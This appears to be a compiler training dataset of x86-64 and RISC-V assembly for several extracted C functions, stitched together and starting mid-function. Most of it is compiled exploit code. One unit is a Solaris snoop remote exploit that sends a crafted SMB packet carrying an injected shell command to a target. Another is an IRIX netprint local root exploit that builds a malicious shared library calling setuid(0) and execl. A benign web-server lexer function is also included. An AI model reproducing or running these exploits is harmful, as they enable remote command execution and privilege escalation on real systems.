leal 1(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 2(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 3(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 4(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 5(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 6(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 7(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 8(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 9(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 10(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 11(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 12(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 13(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 14(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 15(%rax), %ecx movslq %ecx, %rcx movb %dl, 32(%rsp,%rcx) leal 16(%rax), %edx movl 8(%rbx), %ecx movslq %edx, %rdx movb %cl, 32(%rsp,%rdx) leal 17(%rax), %ecx movl 8(%rbx), %edx movslq %ecx, %rcx movb %dh, 32(%rsp,%rcx) leal 18(%rax), %edx movswl 10(%rbx), %ecx addl $19, %eax movslq %edx, %rdx cltq movb %cl, 32(%rsp,%rdx) movzbl 11(%rbx), %edx movb %dl, 32(%rsp,%rax) xorl %eax, %eax call printf@PLT movl SMB_COMMAND_TRIGGER(%rip), %edx movq %r12, %rcx movl %ebp, %edi leaq 20(%rsp), %rsi call send_smb_packet@PLT leaq .LC8(%rip), %rdi call puts@PLT movl %ebp, %edi call close@PLT .L12: movq 1064(%rsp), %rax subq %fs:40, %rax jne .L23 addq $1080, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L21: .cfi_restore_state leaq .LC4(%rip), %rdi call puts@PLT jmp .L12 .L22: leaq .LC0(%rip), %r14 jmp .L13 .L23: call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .globl targets .bss .align 8 .type targets, @object .size targets, 8 targets: .zero 8 .globl optarg .align 8 .type optarg, @object .size optarg, 8 optarg: .zero 8 .globl SOCK_RAW .align 4 .type SOCK_RAW, @object .size SOCK_RAW, 4 SOCK_RAW: .zero 4 .globl SMB_TARGET_DEFAULT .align 8 .type SMB_TARGET_DEFAULT, @object .size SMB_TARGET_DEFAULT, 8 SMB_TARGET_DEFAULT: .zero 8 .globl SMB_PORT_DEFAULT .align 4 .type SMB_PORT_DEFAULT, @object .size SMB_PORT_DEFAULT, 4 SMB_PORT_DEFAULT: .zero 4 .globl SMB_HEADER_FILLER .type SMB_HEADER_FILLER, @object .size SMB_HEADER_FILLER, 1 SMB_HEADER_FILLER: .zero 1 .globl SMB_COMMAND_TRIGGER .align 4 .type SMB_COMMAND_TRIGGER, @object .size SMB_COMMAND_TRIGGER, 4 SMB_COMMAND_TRIGGER: .zero 4 .globl PF_INET .align 4 .type PF_INET, @object .size PF_INET, 4 PF_INET: .zero 4 .globl IPPROTO_TCP .align 4 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .globl EOF .type EOF, @object .size EOF, 1 EOF: .zero 1 .globl AF_INET .align 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .globl g_aug_volatile_5575 .data .align 4 .type g_aug_volatile_5575, @object .size g_aug_volatile_5575, 4 g_aug_volatile_5575: .long 5 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_6328.c_main_aug_v3_5.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "uname -a > /tmp/.patch.your.system.txt" .align 3 .LC1: .string "hoagie_snoop.c - solaris snoop remote\n-andi / void.at\n" .align 3 .LC2: .string "[*] unknown command line option '%c'\n" .align 3 .LC3: .string "hvt:p:r:i:c:" .align 3 .LC4: .string "[*] failed to create raw socket" .align 3 .LC5: .string "[*] attacking '%s' on '%s' ...\n" .align 3 .LC6: .string ";%s;" .align 3 .LC7: .string "[*] execute '%s' now ...\n" .align 3 .LC8: .string "[*] done" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-1184 sd s11,1080(sp) la s11,__stack_chk_guard ld a5, 0(s11) sd a5, 1064(sp) li a5, 0 lw a5,.LANCHOR0 addiw a5,a5,1 sd s0,1168(sp) sd s2,1152(sp) lla s0,.LANCHOR1 mv s2,a0 lla a0,.LC1 sd s3,1144(sp) sd s8,1104(sp) sd s9,1096(sp) sd s10,1088(sp) sw a5,.LANCHOR0,a4 ld s10,0(s0) lw s8,8(s0) sd ra,1176(sp) sd s1,1160(sp) sd s4,1136(sp) sd s5,1128(sp) sd s6,1120(sp) sd s7,1112(sp) mv s3,a1 call puts@plt li a5,1 sd zero,8(sp) li s9,0 ble s2,a5,.L18 lla s4,.LC3 li s1,112 li s7,116 li s6,99 li s5,105 .L2: mv a2,s4 mv a1,s3 mv a0,s2 call getopt@plt lbu a5,24(s0) beq a5,a0,.L3 .L10: beq a0,s1,.L4 bgtu a0,s1,.L5 beq a0,s6,.L6 bne a0,s5,.L8 ld a0,16(s0) call atoi@plt sd a0,8(sp) mv a2,s4 mv a1,s3 mv a0,s2 call getopt@plt lbu a5,24(s0) bne a5,a0,.L10 .L3: lw a2,28(s0) lw a1,32(s0) lw a0,36(s0) call socket@plt li a5,-1 mv s1,a0 beq a0,a5,.L21 lw a5,40(s0) mv a0,s8 sw a5,32(sp) call htons@plt mv a5,a0 mv a0,s10 sw a5,28(sp) call inet_addr@plt sw a0,24(sp) beq s9,zero,.L22 .L13: ld a4,8(sp) ld a5,48(s0) mv a2,s10 slli s3,a4,4 add a5,a5,s3 ld a1,0(a5) lla a0,.LC5 addi s2,sp,40 call printf@plt mv a3,s9 lla a2,.LC6 li a1,1024 mv a0,s2 call snprintf@plt mv a0,s2 call strlen@plt li a4,255 bgt a0,a4,.L14 li a2,256 subw a2,a2,a0 lbu a1,56(s0) slli a2,a2,32 add a0,s2,a0 srli a2,a2,32 call memset@plt li a0,256 .L14: lbu a4,56(s0) addi a5,a0,1056 addi a3,sp,16 add a3,a5,a3 addiw a2,a0,1 sb a4,-1032(a3) addi a5,a2,1056 addi a3,sp,16 add a2,a5,a3 addiw a3,a0,2 addi a5,a3,1056 addi a3,sp,16 sb a4,-1032(a2) add a3,a5,a3 addiw a2,a0,3 sb a4,-1032(a3) addi a5,a2,1056 addi a3,sp,16 add a2,a5,a3 addiw a3,a0,4 addi a5,a3,1056 addi a3,sp,16 sb a4,-1032(a2) add a3,a5,a3 addiw a2,a0,5 sb a4,-1032(a3) addi a5,a2,1056 addi a3,sp,16 add a2,a5,a3 addiw a3,a0,6 addi a5,a3,1056 addi a3,sp,16 sb a4,-1032(a2) add a3,a5,a3 addiw a2,a0,7 sb a4,-1032(a3) addi a5,a2,1056 addi a3,sp,16 add a2,a5,a3 addiw a3,a0,8 addi a5,a3,1056 addi a3,sp,16 sb a4,-1032(a2) add a3,a5,a3 addiw a2,a0,9 sb a4,-1032(a3) addi a5,a2,1056 addi a3,sp,16 add a2,a5,a3 addiw a3,a0,10 addi a5,a3,1056 addi a3,sp,16 sb a4,-1032(a2) add a3,a5,a3 addiw a2,a0,11 sb a4,-1032(a3) addi a5,a2,1056 addi a3,sp,16 add a2,a5,a3 addiw a3,a0,12 sb a4,-1032(a2) addi a5,a3,1056 addiw a2,a0,13 addi a3,sp,16 add a3,a5,a3 addi a5,a2,1056 addi a2,sp,16 sb a4,-1032(a3) add a2,a5,a2 addiw a1,a0,14 sb a4,-1032(a2) addi a5,a1,1056 addi a2,sp,16 add a1,a5,a2 ld a3,48(s0) addiw a2,a0,15 addi a5,a2,1056 addi a2,sp,16 sb a4,-1032(a1) add a2,a5,a2 sb a4,-1032(a2) add a4,a3,s3 lw a2,8(a4) addiw a3,a0,16 addi a5,a3,1056 addi a3,sp,16 add a3,a5,a3 sb a2,-1032(a3) lw a2,8(a4) addiw a3,a0,17 addi a5,a3,1056 addi a3,sp,16 add a3,a5,a3 sraiw a2,a2,8 sb a2,-1032(a3) lh a2,10(a4) addiw a3,a0,18 addi a5,a3,1056 addi a3,sp,16 add a3,a5,a3 sb a2,-1032(a3) lbu a4,11(a4) addiw a5,a0,19 addi a3,sp,16 addi a5,a5,1056 add a5,a5,a3 sb a4,-1032(a5) mv a1,s9 lla a0,.LC7 call printf@plt lw a2,60(s0) mv a3,s2 addi a1,sp,24 mv a0,s1 call send_smb_packet@plt lla a0,.LC8 call puts@plt mv a0,s1 call close@plt .L12: ld a4, 1064(sp) ld a5, 0(s11) xor a5, a4, a5 li a4, 0 bne a5,zero,.L23 ld ra,1176(sp) ld s0,1168(sp) ld s1,1160(sp) ld s2,1152(sp) ld s3,1144(sp) ld s4,1136(sp) ld s5,1128(sp) ld s6,1120(sp) ld s7,1112(sp) ld s8,1104(sp) ld s9,1096(sp) ld s10,1088(sp) ld s11,1080(sp) li a0,0 addi sp,sp,1184 jr ra .L5: bne a0,s7,.L8 ld s10,16(s0) j .L2 .L4: ld a0,16(s0) call atoi@plt mv s8,a0 j .L2 .L8: sext.w a1,a0 lla a0,.LC2 call printf@plt li a0,-1 call exit@plt j .L2 .L6: ld s9,16(s0) j .L2 .L21: lla a0,.LC4 call puts@plt j .L12 .L18: mv a1,s3 mv a0,s2 call usage@plt j .L3 .L22: lla s9,.LC0 j .L13 .L23: call __stack_chk_fail@plt .size main, .-main .globl targets .globl optarg .globl SOCK_RAW .globl SMB_TARGET_DEFAULT .globl SMB_PORT_DEFAULT .globl SMB_HEADER_FILLER .globl SMB_COMMAND_TRIGGER .globl PF_INET .globl IPPROTO_TCP .globl EOF .globl AF_INET .globl g_aug_volatile_5575 .data .align 2 .set .LANCHOR0,. + 0 .type g_aug_volatile_5575, @object .size g_aug_volatile_5575, 4 g_aug_volatile_5575: .word 5 .bss .align 3 .set .LANCHOR1,. + 0 .type SMB_TARGET_DEFAULT, @object .size SMB_TARGET_DEFAULT, 8 SMB_TARGET_DEFAULT: .zero 8 .type SMB_PORT_DEFAULT, @object .size SMB_PORT_DEFAULT, 4 SMB_PORT_DEFAULT: .zero 4 .zero 4 .type optarg, @object .size optarg, 8 optarg: .zero 8 .type EOF, @object .size EOF, 1 EOF: .zero 1 .zero 3 .type IPPROTO_TCP, @object .size IPPROTO_TCP, 4 IPPROTO_TCP: .zero 4 .type SOCK_RAW, @object .size SOCK_RAW, 4 SOCK_RAW: .zero 4 .type PF_INET, @object .size PF_INET, 4 PF_INET: .zero 4 .type AF_INET, @object .size AF_INET, 4 AF_INET: .zero 4 .zero 4 .type targets, @object .size targets, 8 targets: .zero 8 .type SMB_HEADER_FILLER, @object .size SMB_HEADER_FILLER, 1 SMB_HEADER_FILLER: .zero 1 .zero 3 .type SMB_COMMAND_TRIGGER, @object .size SMB_COMMAND_TRIGGER, 4 SMB_COMMAND_TRIGGER: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_lwan-template.c_unexpected_lexeme_aug_v3_8
.file "extr_lwan-template.c_unexpected_lexeme_aug_v3_8.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "unexpected lexeme: %s [%.*s]" .text .p2align 4 .type unexpected_lexeme, @function unexpected_lexeme: .LFB0: .cfi_startproc endbr64 movq (%rdi), %rax cmpq LEXEME_ERROR(%rip), %rax je .L2 movl 8(%rdi), %r8d movq lexeme_type_str(%rip), %rdx leaq .LC0(%rip), %rsi movl 16(%rdi), %ecx movl (%rdx,%rax,4), %edx jmp error_lexeme@PLT .p2align 4,,10 .p2align 3 .L2: xorl %eax, %eax ret .cfi_endproc .LFE0: .size unexpected_lexeme, .-unexpected_lexeme .globl lexeme_type_str .bss .align 8 .type lexeme_type_str, @object .size lexeme_type_str, 8 lexeme_type_str: .zero 8 .globl LEXEME_ERROR .align 8 .type LEXEME_ERROR, @object .size LEXEME_ERROR, 8 LEXEME_ERROR: .zero 8 .globl g_aug_volatile_3379 .data .align 4 .type g_aug_volatile_3379, @object .size g_aug_volatile_3379, 4 g_aug_volatile_3379: .long 6 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_lwan-template.c_unexpected_lexeme_aug_v3_8.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "unexpected lexeme: %s [%.*s]" .text .align 1 .type unexpected_lexeme, @function unexpected_lexeme: lla a3,.LANCHOR0 ld a4,0(a0) ld a2,0(a3) beq a4,a2,.L2 ld a2,8(a3) slli a3,a4,2 lw a4,8(a0) add a2,a2,a3 lw a2,0(a2) lw a3,16(a0) lla a1,.LC0 tail error_lexeme@plt .L2: li a0,0 ret .size unexpected_lexeme, .-unexpected_lexeme .globl lexeme_type_str .globl LEXEME_ERROR .globl g_aug_volatile_3379 .data .align 2 .type g_aug_volatile_3379, @object .size g_aug_volatile_3379, 4 g_aug_volatile_3379: .word 6 .bss .align 3 .set .LANCHOR0,. + 0 .type LEXEME_ERROR, @object .size LEXEME_ERROR, 8 LEXEME_ERROR: .zero 8 .type lexeme_type_str, @object .size lexeme_type_str, 8 lexeme_type_str: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_20804.c_main_aug_v3_1
.file "extr_20804.c_main_aug_v3_1.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[(IRIX)netprint[] local root exploit, by: v9[[email protected]]. ]" .align 8 .LC1: .string "[!] syntax: %s </path/to/program/to/exec>\n" .align 8 .LC2: .string "[!] failed, could not get stats on %s.\n" .align 8 .LC3: .string "[!] failed, %s is not setuid root.\n" .align 8 .LC4: .string "[!] failed, %s doesn't seem to exist or is not executable.\n" .align 8 .LC5: .string "[!] failed, %s compiler doesn't seem to exist or is not executable.\n" .align 8 .LC6: .string "[*] making symbols source file for netprint to execute." .section .rodata.str1.1,"aMS",@progbits,1 .LC7: .string "w" .section .rodata.str1.8 .align 8 .LC8: .string "[!] failed, could not open temporary file to write to." .section .rodata.str1.1 .LC9: .string "void OpenConn(){\n" .LC10: .string " seteuid(0);\n" .LC11: .string " setuid(0);\n" .LC12: .string " setegid(0);\n" .LC13: .string " setgid(0);\n" .section .rodata.str1.8 .align 8 .LC14: .string " printf(\"[*] success, uid: %%u, euid: %%u, gid: %%u, egid: %%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n" .section .rodata.str1.1 .LC15: .string " execl(\"%s\",\"%s\",0);\n" .LC16: .string "}\n" .LC17: .string "void CloseConn(){}\n" .LC18: .string "void ListPrinters(){}\n" .LC19: .string "void SendJob(){}\n" .LC20: .string "void CancelJob(){}\n" .LC21: .string "void WaitForJob(){}\n" .LC22: .string "void GetQueue(){}\n" .LC23: .string "void StartTagging(){}\n" .LC24: .string "void StopTagging(){}\n" .LC25: .string "void Install(){}\n" .LC26: .string "void IsDest(){}\n" .section .rodata.str1.8 .align 8 .LC27: .string "[*] done, now compiling symbols source file." .align 8 .LC28: .string "[!] failed, could not allocate memory." .section .rodata.str1.1 .LC29: .string "%s %s -shared -o %s" .section .rodata.str1.8 .align 8 .LC30: .string "[*] done, now checking to see if the symbols source compiled." .align 8 .LC31: .string "[!] failed, symbols source was not compiled properly." .align 8 .LC32: .string "[*] done, now executing netprint." .section .rodata.str1.1 .LC33: .string "-p0" .LC34: .string "-h0" .LC35: .string "-n" .LC36: .string "0-0" .section .rodata.str1.8 .align 8 .LC37: .string "[!] failed, %s did not execute properly.\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB0: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movl %edi, %ebp leaq .LC0(%rip), %rdi pushq %rbx .cfi_def_cfa_offset 24 .cfi_offset 3, -24 movq %rsi, %rbx subq $40, %rsp .cfi_def_cfa_offset 64 movq %fs:40, %rax movq %rax, 24(%rsp) xorl %eax, %eax call puts@PLT cmpl $2, %ebp jle .L30 .L2: movq PATH(%rip), %rdi movq %rsp, %rsi call stat@PLT testq %rax, %rax jne .L31 .L3: cmpq $0, 8(%rsp) jne .L4 movl (%rsp), %eax andl S_ISUID(%rip), %eax je .L4 .L5: movq 8(%rbx), %rdi movl X_OK(%rip), %esi call access@PLT testq %rax, %rax jne .L32 .L6: movl X_OK(%rip), %esi movq CCPATH(%rip), %rdi call access@PLT testq %rax, %rax jne .L33 .L7: leaq .LC6(%rip), %rdi call puts@PLT xorl %edi, %edi call cleanup@PLT movq SRCFILE(%rip), %rdi leaq .LC7(%rip), %rsi call fopen@PLT movq %rax, %rbp testq %rax, %rax je .L34 .L8: movq %rbp, %rcx movl $17, %edx movl $1, %esi leaq .LC9(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $13, %edx movl $1, %esi leaq .LC10(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $12, %edx movl $1, %esi leaq .LC11(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $13, %edx movl $1, %esi leaq .LC12(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $12, %edx movl $1, %esi leaq .LC13(%rip), %rdi call fwrite@PLT movq %rbp, %rdi leaq .LC14(%rip), %rsi xorl %eax, %eax call fprintf@PLT movq 8(%rbx), %rdx movq %rbp, %rdi xorl %eax, %eax leaq .LC15(%rip), %rsi movq %rdx, %rcx call fprintf@PLT movq %rbp, %rcx movl $2, %edx movl $1, %esi leaq .LC16(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $19, %edx movl $1, %esi leaq .LC17(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $22, %edx movl $1, %esi leaq .LC18(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $17, %edx movl $1, %esi leaq .LC19(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $19, %edx movl $1, %esi leaq .LC20(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $20, %edx movl $1, %esi leaq .LC21(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $18, %edx movl $1, %esi leaq .LC22(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $22, %edx movl $1, %esi leaq .LC23(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $21, %edx movl $1, %esi leaq .LC24(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $17, %edx movl $1, %esi leaq .LC25(%rip), %rdi call fwrite@PLT movq %rbp, %rcx movl $16, %edx movl $1, %esi leaq .LC26(%rip), %rdi call fwrite@PLT movq %rbp, %rdi call fclose@PLT leaq .LC27(%rip), %rdi call puts@PLT movq CCPATH(%rip), %rdi call strlen@PLT movq SRCFILE(%rip), %rdi movq %rax, %rbp call strlen@PLT movq SOFILE(%rip), %rdi movq %rax, %rbx call strlen@PLT addq %rbx, %rbp leaq 14(%rbp,%rax), %rdi call malloc@PLT movq %rax, %rbp testq %rax, %rax je .L35 .L9: movq SOFILE(%rip), %r8 movq SRCFILE(%rip), %rcx movq %rbp, %rdi leaq .LC29(%rip), %rsi movq CCPATH(%rip), %rdx call sprintf@PLT movq %rbp, %rdi call system@PLT leaq .LC30(%rip), %rdi call puts@PLT movl R_OK(%rip), %esi movq SOFILE(%rip), %rdi call access@PLT testq %rax, %rax jne .L36 .L10: leaq .LC32(%rip), %rdi call puts@PLT leaq .LC36(%rip), %rax pushq $0 .cfi_def_cfa_offset 72 movq PATH(%rip), %rdi pushq %rax .cfi_def_cfa_offset 80 movl FAKESOFILE(%rip), %ecx leaq .LC35(%rip), %rdx leaq .LC33(%rip), %r9 leaq .LC34(%rip), %r8 movq %rdi, %rsi call execl@PLT popq %rdx .cfi_def_cfa_offset 72 popq %rcx .cfi_def_cfa_offset 64 testq %rax, %rax jne .L37 .L11: movq 24(%rsp), %rax subq %fs:40, %rax jne .L38 addq $40, %rsp .cfi_remember_state .cfi_def_cfa_offset 24 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 16 popq %rbp .cfi_def_cfa_offset 8 ret .L4: .cfi_restore_state movq PATH(%rip), %rsi leaq .LC3(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call cleanup@PLT jmp .L5 .L30: movq (%rbx), %rsi leaq .LC1(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call cleanup@PLT jmp .L2 .L37: movq PATH(%rip), %rsi leaq .LC37(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call cleanup@PLT jmp .L11 .L36: leaq .LC31(%rip), %rdi call puts@PLT movl $1, %edi call cleanup@PLT jmp .L10 .L35: leaq .LC28(%rip), %rdi call puts@PLT movl $1, %edi call cleanup@PLT jmp .L9 .L33: movq CCPATH(%rip), %rsi leaq .LC5(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call cleanup@PLT jmp .L7 .L32: movq 8(%rbx), %rsi leaq .LC4(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call cleanup@PLT jmp .L6 .L31: movq PATH(%rip), %rsi leaq .LC2(%rip), %rdi xorl %eax, %eax call printf@PLT movl $1, %edi call cleanup@PLT jmp .L3 .L34: leaq .LC8(%rip), %rdi call puts@PLT movl $1, %edi call cleanup@PLT jmp .L8 .L38: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size main, .-main .globl X_OK .bss .align 4 .type X_OK, @object .size X_OK, 4 X_OK: .zero 4 .globl S_ISUID .align 4 .type S_ISUID, @object .size S_ISUID, 4 S_ISUID: .zero 4 .globl SRCFILE .align 8 .type SRCFILE, @object .size SRCFILE, 8 SRCFILE: .zero 8 .globl SOFILE .align 8 .type SOFILE, @object .size SOFILE, 8 SOFILE: .zero 8 .globl R_OK .align 4 .type R_OK, @object .size R_OK, 4 R_OK: .zero 4 .globl PATH .align 8 .type PATH, @object .size PATH, 8 PATH: .zero 8 .globl FAKESOFILE .align 4 .type FAKESOFILE, @object .size FAKESOFILE, 4 FAKESOFILE: .zero 4 .globl CCPATH .align 8 .type CCPATH, @object .size CCPATH, 8 CCPATH: .zero 8 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_20804.c_main_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[(IRIX)netprint[] local root exploit, by: v9[[email protected]]. ]" .align 3 .LC1: .string "[!] syntax: %s </path/to/program/to/exec>\n" .align 3 .LC2: .string "[!] failed, could not get stats on %s.\n" .align 3 .LC3: .string "[!] failed, %s is not setuid root.\n" .align 3 .LC4: .string "[!] failed, %s doesn't seem to exist or is not executable.\n" .align 3 .LC5: .string "[!] failed, %s compiler doesn't seem to exist or is not executable.\n" .align 3 .LC6: .string "[*] making symbols source file for netprint to execute." .align 3 .LC7: .string "w" .align 3 .LC8: .string "[!] failed, could not open temporary file to write to." .align 3 .LC9: .string "void OpenConn(){\n" .align 3 .LC10: .string " seteuid(0);\n" .align 3 .LC11: .string " setuid(0);\n" .align 3 .LC12: .string " setegid(0);\n" .align 3 .LC13: .string " setgid(0);\n" .align 3 .LC14: .string " printf(\"[*] success, uid: %%u, euid: %%u, gid: %%u, egid: %%u.\\n\",getuid(),geteuid(),getgid(),getegid());\n" .align 3 .LC15: .string " execl(\"%s\",\"%s\",0);\n" .align 3 .LC16: .string "}\n" .align 3 .LC17: .string "void CloseConn(){}\n" .align 3 .LC18: .string "void ListPrinters(){}\n" .align 3 .LC19: .string "void SendJob(){}\n" .align 3 .LC20: .string "void CancelJob(){}\n" .align 3 .LC21: .string "void WaitForJob(){}\n" .align 3 .LC22: .string "void GetQueue(){}\n" .align 3 .LC23: .string "void StartTagging(){}\n" .align 3 .LC24: .string "void StopTagging(){}\n" .align 3 .LC25: .string "void Install(){}\n" .align 3 .LC26: .string "void IsDest(){}\n" .align 3 .LC27: .string "[*] done, now compiling symbols source file." .align 3 .LC28: .string "[!] failed, could not allocate memory." .align 3 .LC29: .string "%s %s -shared -o %s" .align 3 .LC30: .string "[*] done, now checking to see if the symbols source compiled." .align 3 .LC31: .string "[!] failed, symbols source was not compiled properly." .align 3 .LC32: .string "[*] done, now executing netprint." .align 3 .LC33: .string "0-0" .align 3 .LC34: .string "-p0" .align 3 .LC35: .string "-h0" .align 3 .LC36: .string "-n" .align 3 .LC37: .string "[!] failed, %s did not execute properly.\n" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: addi sp,sp,-80 sd s3,40(sp) la s3,__stack_chk_guard sd s0,64(sp) ld a5, 0(s3) sd a5, 24(sp) li a5, 0 mv s0,a0 lla a0,.LC0 sd s2,48(sp) sd ra,72(sp) sd s1,56(sp) mv s2,a1 call puts@plt li a5,2 ble s0,a5,.L30 .L2: lla s1,.LANCHOR0 ld a0,0(s1) addi a1,sp,8 call stat@plt bne a0,zero,.L31 .L3: ld a5,16(sp) bne a5,zero,.L4 lw a5,8(sp) lw a4,8(s1) and a5,a5,a4 beq a5,zero,.L4 .L5: lw a1,12(s1) ld a0,8(s2) call access@plt bne a0,zero,.L32 .L6: lw a1,12(s1) ld a0,16(s1) call access@plt bne a0,zero,.L33 .L7: lla a0,.LC6 call puts@plt li a0,0 call cleanup@plt ld a0,24(s1) lla a1,.LC7 call fopen@plt mv s0,a0 beq a0,zero,.L34 .L8: mv a3,s0 li a2,17 li a1,1 lla a0,.LC9 call fwrite@plt mv a3,s0 li a2,13 li a1,1 lla a0,.LC10 call fwrite@plt mv a3,s0 li a2,12 li a1,1 lla a0,.LC11 call fwrite@plt mv a3,s0 li a2,13 li a1,1 lla a0,.LC12 call fwrite@plt mv a3,s0 li a2,12 li a1,1 lla a0,.LC13 call fwrite@plt lla a1,.LC14 mv a0,s0 call fprintf@plt ld a3,8(s2) lla a1,.LC15 mv a0,s0 mv a2,a3 call fprintf@plt mv a3,s0 li a2,2 li a1,1 lla a0,.LC16 call fwrite@plt mv a3,s0 li a2,19 li a1,1 lla a0,.LC17 call fwrite@plt mv a3,s0 li a2,22 li a1,1 lla a0,.LC18 call fwrite@plt mv a3,s0 li a2,17 li a1,1 lla a0,.LC19 call fwrite@plt mv a3,s0 li a2,19 li a1,1 lla a0,.LC20 call fwrite@plt mv a3,s0 li a2,20 li a1,1 lla a0,.LC21 call fwrite@plt mv a3,s0 li a2,18 li a1,1 lla a0,.LC22 call fwrite@plt mv a3,s0 li a2,22 li a1,1 lla a0,.LC23 call fwrite@plt mv a3,s0 li a2,21 li a1,1 lla a0,.LC24 call fwrite@plt mv a3,s0 li a2,17 li a1,1 lla a0,.LC25 call fwrite@plt mv a3,s0 li a2,16 li a1,1 lla a0,.LC26 call fwrite@plt mv a0,s0 call fclose@plt lla a0,.LC27 call puts@plt ld a0,16(s1) call strlen@plt mv s0,a0 ld a0,24(s1) call strlen@plt mv s2,a0 ld a0,32(s1) add s0,s0,s2 call strlen@plt add a0,s0,a0 addi a0,a0,14 call malloc@plt mv s0,a0 beq a0,zero,.L35 .L9: ld a4,32(s1) ld a3,24(s1) ld a2,16(s1) lla a1,.LC29 mv a0,s0 call sprintf@plt mv a0,s0 call system@plt lla a0,.LC30 call puts@plt lw a1,40(s1) ld a0,32(s1) call access@plt bne a0,zero,.L36 .L10: lla a0,.LC32 call puts@plt ld a1,0(s1) lw a3,44(s1) li a7,0 lla a6,.LC33 lla a5,.LC34 lla a4,.LC35 lla a2,.LC36 mv a0,a1 call execl@plt bne a0,zero,.L37 .L11: ld a4, 24(sp) ld a5, 0(s3) xor a5, a4, a5 li a4, 0 bne a5,zero,.L38 ld ra,72(sp) ld s0,64(sp) ld s1,56(sp) ld s2,48(sp) ld s3,40(sp) li a0,0 addi sp,sp,80 jr ra .L4: ld a1,0(s1) lla a0,.LC3 call printf@plt li a0,1 call cleanup@plt j .L5 .L30: ld a1,0(s2) lla a0,.LC1 call printf@plt li a0,1 call cleanup@plt j .L2 .L37: ld a1,0(s1) lla a0,.LC37 call printf@plt li a0,1 call cleanup@plt j .L11 .L36: lla a0,.LC31 call puts@plt li a0,1 call cleanup@plt j .L10 .L35: lla a0,.LC28 call puts@plt li a0,1 call cleanup@plt j .L9 .L33: ld a1,16(s1) lla a0,.LC5 call printf@plt li a0,1 call cleanup@plt j .L7 .L32: ld a1,8(s2) lla a0,.LC4 call printf@plt li a0,1 